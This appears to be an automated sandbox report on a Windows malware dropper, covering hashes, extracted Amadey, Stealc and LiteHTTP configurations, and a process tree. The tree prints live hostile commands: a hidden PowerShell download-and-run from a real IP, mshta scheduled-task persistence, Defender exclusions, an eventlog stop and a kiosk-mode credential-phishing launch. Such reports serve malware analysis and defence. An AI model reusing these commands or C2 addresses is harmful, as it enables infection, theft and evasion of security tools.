Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 19:40

General

  • Target

    44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe

  • Size

    938KB

  • MD5

    ab988dd02c8cea50ac224daf0e53f3e9

  • SHA1

    050ebd6e5d25d9b84b722dcea79b2243890c1652

  • SHA256

    44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192

  • SHA512

    c8c9044520c124e47ace7b53e1824c70b41792cb7cdde0ab272a936dce82fb567743f1b2a7fa506b6357005974b1f33f8fee3f595b5a366894971de0b6f9f1bd

  • SSDEEP

    24576:lqDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:lTvC/MTQYxsWR7a0Q

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 16 IoCs
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3316
      • C:\Users\Admin\AppData\Local\Temp\44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe
        "C:\Users\Admin\AppData\Local\Temp\44c657fa4e956fb944c42dc881d49a4a719767a2b92d02729e7415a6c6a14192.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3888
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn gCLjbmabI3i /tr "mshta C:\Users\Admin\AppData\Local\Temp\rQw2foPtZ.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4300
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn gCLjbmabI3i /tr "mshta C:\Users\Admin\AppData\Local\Temp\rQw2foPtZ.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:5044
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\rQw2foPtZ.hta
          3⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:924
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2208
            • C:\Users\Admin\AppData\Local\Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE
              "C:\Users\Admin\AppData\Local\Temp9MDGV1BO6ZISXHPSXUPOWGBIHDVAAVJZ.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:536
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Checks computer location settings
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:5032
                • C:\Users\Admin\AppData\Local\Temp\10106150101\6988727892.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106150101\6988727892.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4684
                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    8⤵
                    • Downloads MZ/PE file
                    • System Location Discovery: System Language Discovery
                    PID:4924
                • C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:32
                  • C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe
                    "C:\Users\Admin\AppData\Local\Temp\10106160101\20a66c7e87.exe"
                    8⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2152
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 32 -s 800
                    8⤵
                    • Program crash
                    PID:4600
                • C:\Users\Admin\AppData\Local\Temp\10106170101\b4727e7654.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106170101\b4727e7654.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:1464
                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    8⤵
                    • Downloads MZ/PE file
                    • System Location Discovery: System Language Discovery
                    PID:5476
                • C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops startup file
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:8
                • C:\Users\Admin\AppData\Local\Temp\10106200101\445719b67a.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106200101\445719b67a.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5792
                • C:\Users\Admin\AppData\Local\Temp\10106210101\9133893bdd.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106210101\9133893bdd.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Downloads MZ/PE file
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2300
                  • C:\Users\Admin\AppData\Local\Temp\S3QJ9ZRVCQEWMP1J3S.exe
                    "C:\Users\Admin\AppData\Local\Temp\S3QJ9ZRVCQEWMP1J3S.exe"
                    8⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1360
                • C:\Users\Admin\AppData\Local\Temp\10106220101\9f85653241.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106220101\9f85653241.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5132
                • C:\Users\Admin\AppData\Local\Temp\10106230101\3dafbcc94d.exe
                  "C:\Users\Admin\AppData\Local\Temp\10106230101\3dafbcc94d.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:456
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM firefox.exe /T
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5488
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM chrome.exe /T
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4908
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM msedge.exe /T
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3256
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM opera.exe /T
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:6060
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F /IM brave.exe /T
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3564
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                    8⤵
                      PID:5920
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                        9⤵
                        • Checks processor information in registry
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        • Suspicious use of SetWindowsHookEx
                        PID:5952
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 27131 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b6708c7-3792-419b-969f-1af404b442ea} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" gpu
                          10⤵
                            PID:912
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2432 -prefsLen 28051 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6ca92e3-1caf-41b8-b3ae-50a04dc4c0c9} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" socket
                            10⤵
                              PID:1920
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3152 -childID 1 -isForBrowser -prefsHandle 1516 -prefMapHandle 2800 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {501cc007-e2bf-4449-b80a-c2d435efe686} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab
                              10⤵
                                PID:4500
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1236 -childID 2 -isForBrowser -prefsHandle 3972 -prefMapHandle 3968 -prefsLen 32541 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1ad848b9-c1b3-43bc-a74e-93bb58ef10d9} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab
                                10⤵
                                  PID:4236
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4572 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4780 -prefMapHandle 4792 -prefsLen 32541 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eca09ec7-5843-48fa-b3b7-5f477d4e11a5} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" utility
                                  10⤵
                                  • Checks processor information in registry
                                  PID:836
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5156 -childID 3 -isForBrowser -prefsHandle 5148 -prefMapHandle 3828 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2daac9da-94e6-4410-b569-e687e8f3f6ea} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab
                                  10⤵
                                    PID:2848
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5184 -childID 4 -isForBrowser -prefsHandle 5304 -prefMapHandle 5308 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6a1720ba-9adc-4c7d-bbe1-1e9c7dbfab63} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab
                                    10⤵
                                      PID:5524
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5556 -childID 5 -isForBrowser -prefsHandle 5632 -prefMapHandle 5628 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {514f2256-a8b5-45af-81d0-4743f169e7b1} 5952 "\\.\pipe\gecko-crash-server-pipe.5952" tab
                                      10⤵
                                        PID:812
                                • C:\Users\Admin\AppData\Local\Temp\10106240101\de5df7d9f4.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106240101\de5df7d9f4.exe"
                                  7⤵
                                  • Modifies Windows Defender DisableAntiSpyware settings
                                  • Modifies Windows Defender Real-time Protection settings
                                  • Modifies Windows Defender TamperProtection settings
                                  • Modifies Windows Defender notification settings
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Windows security modification
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5680
                                • C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"
                                  7⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4928
                                • C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"
                                  7⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1464
                                • C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  PID:6240
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    8⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4740
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    8⤵
                                      PID:620
                                      • C:\Windows\system32\wusa.exe
                                        wusa /uninstall /kb:890830 /quiet /norestart
                                        9⤵
                                          PID:636
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        8⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4816
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        8⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5672
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        8⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3024
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        8⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5636
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe delete "DWENDQPG"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2264
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2116
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop eventlog
                                        8⤵
                                        • Launches sc.exe
                                        PID:5600
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe start "DWENDQPG"
                                        8⤵
                                        • Launches sc.exe
                                        PID:3088
                                    • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • System Location Discovery: System Language Discovery
                                      PID:6640
                                      • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        PID:6720
                                      • C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:6744
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 788
                                        8⤵
                                        • Program crash
                                        PID:6836
                                    • C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:2388
                                      • C:\Windows\Temp\{5D1699EF-D116-49B6-A148-288D6312C99E}\.cr\Y87Oyyz.exe
                                        "C:\Windows\Temp\{5D1699EF-D116-49B6-A148-288D6312C99E}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548
                                        8⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • System Location Discovery: System Language Discovery
                                        PID:3452
                                        • C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\SplashWin.exe
                                          C:\Windows\Temp\{4956A76E-DEB4-45ED-8D69-7E9A2D141050}\.ba\SplashWin.exe
                                          9⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • System Location Discovery: System Language Discovery
                                          PID:5632
                                          • C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                                            C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                                            10⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: MapViewOfSection
                                            PID:1372
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\SysWOW64\cmd.exe
                                              11⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3172
                                    • C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:7092
                                    • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • System Location Discovery: System Language Discovery
                                      PID:2816
                                      • C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
                                        "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:1092
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 804
                                        8⤵
                                        • Program crash
                                        PID:6052
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            2⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5356
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            2⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5252
                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                          1⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2256
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 32 -ip 32
                          1⤵
                            PID:3192
                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                            1⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5508
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6640 -ip 6640
                            1⤵
                              PID:6784
                            • C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
